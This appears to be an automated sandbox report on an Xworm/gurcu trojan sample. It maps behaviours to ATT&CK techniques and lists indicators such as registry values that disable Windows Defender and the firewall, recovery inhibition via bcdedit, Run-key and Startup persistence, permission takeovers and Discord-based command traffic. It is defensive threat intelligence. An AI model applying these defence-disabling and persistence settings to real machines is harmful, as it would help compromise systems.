gurcu | 159c1154b8553b15f7feebbb129b1a69ce1f24dea85e2837ad84160e1ce6dc5c

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies security service 2 TTPs 4 IoCs

Modify Registry

Windows Service

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
4960	bcdedit.exe
4480	bcdedit.exe
1772	bcdedit.exe
3544	bcdedit.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4972	powershell.exe
4832	powershell.exe
2084	powershell.exe
3768	powershell.exe
4984	powershell.exe
3320	powershell.exe
4064	powershell.exe
5988	powershell.exe
4040	powershell.exe
6124	powershell.exe
7452	powershell.exe
4492	powershell.exe
5220	powershell.exe
5292	powershell.exe
692	powershell.exe
5936	powershell.exe
5200	powershell.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
defense_evasion

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Manipulates Digital Signatures 1 TTPs 15 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Software\Rasauq on top\	reg.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top\	reg.exe

Modifies Windows Firewall 2 TTPs 4 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
3920	netsh.exe
5592	netsh.exe
1160	netsh.exe
1856	netsh.exe

Possible privilege escalation attempt 32 IoCs

exploit

pid	Process
644	takeown.exe
944	takeown.exe
5184	icacls.exe
4148	icacls.exe
3700	takeown.exe
3076	takeown.exe
1188	icacls.exe
3656	takeown.exe
4880	icacls.exe
5396	icacls.exe
5240	takeown.exe
3424	takeown.exe
5940	takeown.exe
3540	takeown.exe
1748	takeown.exe
5224	takeown.exe
5084	takeown.exe
5688	takeown.exe
5468	takeown.exe
5692	icacls.exe
1868	icacls.exe
5368	icacls.exe
5516	takeown.exe
3740	icacls.exe
2804	takeown.exe
1160	icacls.exe
1480	icacls.exe
4244	icacls.exe
1800	takeown.exe
4856	icacls.exe
4056	takeown.exe
1044	icacls.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

Hidden Files and Directories

T1564.001

pid	Process
5836	attrib.exe
1196	attrib.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hig.bat	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Service.lnk	Rasauq SoftWorks.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ModMenu.bat	cmd.exe

Executes dropped EXE 5 IoCs

pid	Process
5228	Rasauq SoftWorks.exe
2080	sRasauq SoftWorks.exe
6892	$77RealtekAudioDriverHost.exe
7276	Windows Host Service.scr
17756	Process not Found

Modifies file permissions 1 TTPs 32 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
944	takeown.exe
1748	takeown.exe
5692	icacls.exe
3076	takeown.exe
4244	icacls.exe
4880	icacls.exe
5396	icacls.exe
5224	takeown.exe
1188	icacls.exe
5468	takeown.exe
4856	icacls.exe
1868	icacls.exe
3424	takeown.exe
4056	takeown.exe
5688	takeown.exe
3540	takeown.exe
1800	takeown.exe
2804	takeown.exe
4148	icacls.exe
644	takeown.exe
3656	takeown.exe
5184	icacls.exe
5240	takeown.exe
1480	icacls.exe
5368	icacls.exe
3740	icacls.exe
1160	icacls.exe
5084	takeown.exe
1044	icacls.exe
3700	takeown.exe
5940	takeown.exe
5516	takeown.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host Service = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Service.scr"	Rasauq SoftWorks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Service	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Software\Microsoft\Windows\CurrentVersion\Run\RasauqRemover = "\"\""	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Realtek Audio Driver Host\\$77RealtekAudioDriverHost.exe\""	sRasauq SoftWorks.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
108	discord.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Power Settings 1 TTPs 12 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
5192	powercfg.exe
800	powercfg.exe
4480	powercfg.exe
1688	powercfg.exe
1340	powercfg.exe
4244	powercfg.exe
4756	powercfg.exe
2232	powercfg.exe
1304	powercfg.exe
3436	powercfg.exe
808	powercfg.exe
3864	powercfg.exe

Drops file in System32 directory 24 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfc00A.dat	Process not Found
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File created	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File created	C:\Windows\system32\perfc007.dat	Process not Found
File created	C:\Windows\system32\perfh009.dat	Process not Found
File created	C:\Windows\system32\perfh00A.dat	Process not Found
File created	C:\Windows\system32\perfc010.dat	Process not Found
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	Process not Found
File created	C:\Windows\system32\perfh010.dat	Process not Found
File created	C:\Windows\system32\perfh011.dat	Process not Found
File opened for modification	C:\Windows\system32\PerfStringBackup.INI	Process not Found
File created	C:\Windows\system32\perfc00C.dat	Process not Found
File created	C:\Windows\system32\perfh00C.dat	Process not Found
File created	C:\Windows\system32\perfc011.dat	Process not Found
File created	C:\Windows\system32\PerfStringBackup.TMP	Process not Found
File created	C:\Windows\system32\perfc009.dat	Process not Found
File created	C:\Windows\System32\Rasauq\$77RasauqBroker.bat	cmd.exe
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe
File opened for modification	C:\Windows\System32\$666-RasauqBroker.bat	cmd.exe
File created	C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	Process not Found
File created	C:\Windows\system32\perfh007.dat	Process not Found

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

persistence privilege_escalation

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1678082226-3994841222-899489560-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IMG_3728.png"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe

Drops file in Windows directory 42 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\netrtl64.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\compositebus.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\audioendpoint.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\printqueue.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\disk.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\swenum.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\rdpbus.PNF	powercfg.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\INF\monitor.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\umbus.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\usbport.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\vhdmp.PNF	powercfg.exe
File opened for modification	C:\Windows\SystemTemp	Process not Found
File opened for modification	C:\Windows\INF\c_swdevice.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\hdaudio.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\keyboard.PNF	powercfg.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\INF\cdrom.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\vdrvroot.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\input.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\volume.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\kdnic.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\acpi.PNF	powercfg.exe
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.h	Process not Found
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.ini	Process not Found
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe
File opened for modification	C:\Windows\INF\volmgr.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\pci.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\mshdc.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\msmouse.PNF	powercfg.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe
File opened for modification	C:\Windows\inf\WmiApRpl\WmiApRpl.h	Process not Found
File opened for modification	C:\Windows\INF\hdaudbus.PNF	powercfg.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\INF\spaceport.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\cpu.PNF	powercfg.exe
File opened for modification	C:\Windows\INF\mssmbios.PNF	powercfg.exe
File created	C:\Windows\inf\WmiApRpl\WmiApRpl.ini	Process not Found

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
976	sc.exe
3344	sc.exe
3164	sc.exe
4936	sc.exe
4556	sc.exe
1668	sc.exe
5432	sc.exe
5184	sc.exe
4448	sc.exe
436	sc.exe
5432	sc.exe
772	sc.exe
3236	sc.exe
5456	sc.exe
2496	sc.exe
1252	sc.exe
2324	sc.exe
5680	sc.exe
3536	sc.exe
5580	sc.exe
2160	sc.exe
2152	sc.exe
5848	sc.exe
4060	sc.exe
976	sc.exe
5480	sc.exe
5532	sc.exe
3552	sc.exe
5444	sc.exe
1448	sc.exe
244	sc.exe
5592	sc.exe
4540	sc.exe
3772	sc.exe
4848	sc.exe
5688	sc.exe
4224	sc.exe
4124	sc.exe
4612	sc.exe
5096	sc.exe
5596	sc.exe
6028	sc.exe
3940	sc.exe
5508	sc.exe
5508	sc.exe
3372	sc.exe
324	sc.exe
2740	sc.exe
2908	sc.exe
3672	sc.exe
4540	sc.exe
3784	sc.exe
3884	sc.exe
1168	sc.exe
1496	sc.exe
4824	sc.exe
2428	sc.exe
4808	sc.exe
3200	sc.exe
2916	sc.exe
1452	sc.exe
5880	sc.exe
4012	sc.exe
6012	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000E	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0003	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0020	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	powercfg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0002	powercfg.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	powercfg.exe
